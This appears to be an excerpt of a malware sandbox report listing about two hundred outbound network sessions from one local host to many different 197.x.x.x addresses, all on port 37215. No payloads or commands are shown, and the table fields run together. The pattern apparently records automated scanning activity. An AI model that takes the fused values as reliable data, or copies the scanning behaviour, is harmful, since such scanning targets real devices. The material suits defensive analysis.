                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28804192.168.2.1548700197.234.7.3637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28805192.168.2.1546506197.185.187.8837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28806192.168.2.1533034197.21.33.3537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28807192.168.2.1540994197.149.166.12537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28808192.168.2.1545448197.37.74.12237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28809192.168.2.1537406197.8.171.7237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28810192.168.2.1547876197.107.248.16437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28811192.168.2.1534434197.61.35.12937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28812192.168.2.1544026197.182.212.17937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28813192.168.2.1557532197.95.247.9637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28814192.168.2.1537816197.230.247.25437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28815192.168.2.1549380197.55.140.15337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28816192.168.2.1552394197.238.195.4037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28817192.168.2.1549476197.72.242.337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28818192.168.2.1534056197.190.19.24337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28819192.168.2.1532826197.227.44.25437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28820192.168.2.1556768197.107.63.23337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28821192.168.2.1557254197.221.250.24737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28822192.168.2.1557564197.114.252.8937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28823192.168.2.1548970197.76.147.11237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28824192.168.2.1552134197.83.175.12437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28825192.168.2.1550194197.255.242.13137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28826192.168.2.1546832197.70.19.18337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28827192.168.2.1544202197.165.93.4037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28828192.168.2.1540014197.109.180.14037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28829192.168.2.1556514197.66.160.19837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28830192.168.2.1550300197.111.196.16437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28831192.168.2.1557600197.247.159.17637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28832192.168.2.1544032197.105.10.23737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28833192.168.2.1534480197.35.223.7937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28834192.168.2.1533264197.91.129.137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28835192.168.2.1556086197.53.175.16237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28836192.168.2.1547794197.22.205.17137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28837192.168.2.1541984197.145.117.25537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28838192.168.2.1542590197.137.207.537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28839192.168.2.1557314197.156.61.2537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28840192.168.2.1560772197.196.255.3737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28841192.168.2.1544998197.12.132.20437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28842192.168.2.1532962197.125.175.5437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28843192.168.2.1560486197.117.190.1837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28844192.168.2.1537852197.119.141.23737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28845192.168.2.1536478197.253.54.19237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28846192.168.2.1554740197.131.220.7937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28847192.168.2.1545452197.55.183.20237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28848192.168.2.1535950197.189.179.16737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28849192.168.2.1554722197.182.181.18137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28850192.168.2.1551954197.34.213.18037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28851192.168.2.1557048197.153.214.6037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28852192.168.2.1558486197.246.211.7037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28853192.168.2.1536348197.239.129.537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28854192.168.2.1539188197.155.7.837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28855192.168.2.1533804197.122.182.15637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28856192.168.2.1559270197.169.49.537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28857192.168.2.1545746197.159.173.25537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28858192.168.2.1557042197.85.222.6637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28859192.168.2.1560782197.254.214.21837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28860192.168.2.1555458197.237.118.19737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28861192.168.2.1547798197.236.128.2337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28862192.168.2.1534374197.44.40.12937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28863192.168.2.1539860197.224.131.037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28864192.168.2.1546994197.122.226.14237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28865192.168.2.1556456197.57.250.8637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28866192.168.2.1535778197.77.65.937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28867192.168.2.1536716197.173.254.2437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28868192.168.2.1554694197.130.192.13637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28869192.168.2.1543496197.42.211.17237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28870192.168.2.1542000197.182.93.10337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28871192.168.2.1554366197.157.221.10237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28872192.168.2.1541112197.66.138.21337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28873192.168.2.1545644197.48.239.22537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28874192.168.2.1549904197.44.188.22137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28875192.168.2.1554018197.95.88.23137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28876192.168.2.1556838197.218.14.17137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28877192.168.2.1543620197.89.201.3837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28878192.168.2.1542776197.211.164.3337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28879192.168.2.1543472197.164.239.8637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28880192.168.2.1550528197.117.209.3537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28881192.168.2.1545952197.155.65.6237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28882192.168.2.1555100197.45.247.21037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28883192.168.2.1534746197.234.176.19937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28884192.168.2.1557140197.241.156.25337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28885192.168.2.1560972197.8.231.8037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28886192.168.2.1559878197.226.147.7837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28887192.168.2.1533162197.242.138.2137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28888192.168.2.1534438197.69.96.9337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28889192.168.2.1550658197.254.215.19737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28890192.168.2.1544180197.9.96.15537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28891192.168.2.1546024197.77.228.24937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28892192.168.2.1551310197.237.84.24837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28893192.168.2.1547860197.169.27.20037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28894192.168.2.1551220197.14.29.11837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28895192.168.2.1552232197.22.120.2037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28896192.168.2.1545108197.192.208.14837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28897192.168.2.1548818197.176.248.23637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28898192.168.2.1554322197.61.247.037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28899192.168.2.1548238197.154.4.21737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28900192.168.2.1534452197.106.80.8237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28901192.168.2.1534174197.177.19.19937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28902192.168.2.1552700197.124.42.8837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28903192.168.2.1546448197.239.238.11537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28904192.168.2.1547558197.90.111.19637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28905192.168.2.1552846197.108.145.8537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28906192.168.2.1544822197.251.103.14437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28907192.168.2.1534248197.192.145.4037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28908192.168.2.1547196197.24.177.17437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28909192.168.2.1547696197.17.182.21437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28910192.168.2.1536748197.46.38.8537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28911192.168.2.1538090197.186.172.14037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28912192.168.2.1537756197.62.132.9237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28913192.168.2.1553098197.22.8.22937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28914192.168.2.1555804197.203.130.13437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28915192.168.2.1539024197.179.175.13237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28916192.168.2.1542702197.230.208.25137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28917192.168.2.1544868197.132.107.1137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28918192.168.2.1546114197.68.208.10737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28919192.168.2.1558794197.210.106.11137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28920192.168.2.1534354197.244.199.8437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28921192.168.2.1553100197.50.103.19237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28922192.168.2.1536650197.225.51.7537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28923192.168.2.1536686197.39.3.11137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28924192.168.2.1543574197.54.77.24237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28925192.168.2.1537750197.97.159.2937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28926192.168.2.1559742197.170.55.937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28927192.168.2.1546968197.75.117.7137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28928192.168.2.1544840197.29.69.20937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28929192.168.2.1542334197.223.94.13237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28930192.168.2.1558830197.232.29.837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28931192.168.2.1542280197.63.134.24337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28932192.168.2.1548034197.240.66.23737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28933192.168.2.1536514197.253.243.15837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28934192.168.2.1548172197.153.118.21237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28935192.168.2.1546794197.1.169.19537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28936192.168.2.1552114197.116.146.24437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28937192.168.2.1551936197.133.200.14837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28938192.168.2.1541722197.227.174.22237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28939192.168.2.1534202197.31.12.22537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28940192.168.2.1538384197.232.60.4437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28941192.168.2.1551528197.78.11.23737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28942192.168.2.1548450197.64.215.4937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28943192.168.2.1541172197.85.239.7437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28944192.168.2.1540564197.217.193.1637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28945192.168.2.1545368197.176.11.19737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28946192.168.2.1557196197.152.86.3737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28947192.168.2.1544032197.69.226.8037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28948192.168.2.1545844197.86.147.18937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28949192.168.2.1555110197.58.65.20837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28950192.168.2.1538290197.42.49.737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28951192.168.2.1541704197.160.99.23137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28952192.168.2.1560564197.238.81.24637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28953192.168.2.1542864197.16.59.19237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28954192.168.2.1546656197.229.157.4637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28955192.168.2.1544128197.79.161.5937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28956192.168.2.1548526197.137.115.18837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28957192.168.2.1549898197.189.204.19937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28958192.168.2.1554240197.175.169.3037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28959192.168.2.1547350197.129.222.13737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28960192.168.2.1548042197.185.87.3937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28961192.168.2.1537070197.49.124.24637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28962192.168.2.1543886197.32.245.19037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28963192.168.2.1547094197.62.110.837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28964192.168.2.1548732197.195.4.3637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28965192.168.2.1557518197.6.164.437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28966192.168.2.1546212197.55.62.5437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28967192.168.2.1547686197.177.231.17237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28968192.168.2.1560688197.84.89.4137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28969192.168.2.1543130197.243.197.9137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28970192.168.2.1547912197.40.15.1437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28971192.168.2.1547156197.66.79.25137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28972192.168.2.1560658197.61.166.23737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28973192.168.2.1553704197.10.187.21537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28974192.168.2.1541324197.58.7.1837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28975192.168.2.1535646197.39.146.19037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28976192.168.2.1560602197.229.161.11237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28977192.168.2.1559492197.124.136.6737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28978192.168.2.1536248197.73.223.11237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28979192.168.2.1535618197.114.120.10837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28980192.168.2.1559334197.234.15.25137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28981192.168.2.1557568197.103.219.4737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28982192.168.2.1538318197.247.34.10237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28983192.168.2.1542872197.88.99.11937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28984192.168.2.1547154197.192.203.11137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28985192.168.2.1534242197.1.210.16437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28986192.168.2.1556376197.26.225.137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28987192.168.2.1546460197.13.51.10137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28988192.168.2.1543156197.77.61.10937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28989192.168.2.1546862197.35.115.24437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28990192.168.2.1533930197.237.77.3337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28991192.168.2.1554230197.242.63.12637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28992192.168.2.1558536197.54.73.19837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28993192.168.2.1545954197.187.202.6837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28994192.168.2.1538112197.125.205.12337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28995192.168.2.1540064197.174.140.16537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28996192.168.2.1554624197.110.78.14737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28997192.168.2.1552008197.83.242.4037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28998192.168.2.1537358197.48.93.13537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28999192.168.2.1546328197.101.246.17537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29000192.168.2.1537830197.143.119.24237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29001192.168.2.1545300197.234.112.7337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29002192.168.2.1555340197.254.88.837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            29003192.168.2.1539998197.85.200.3637215
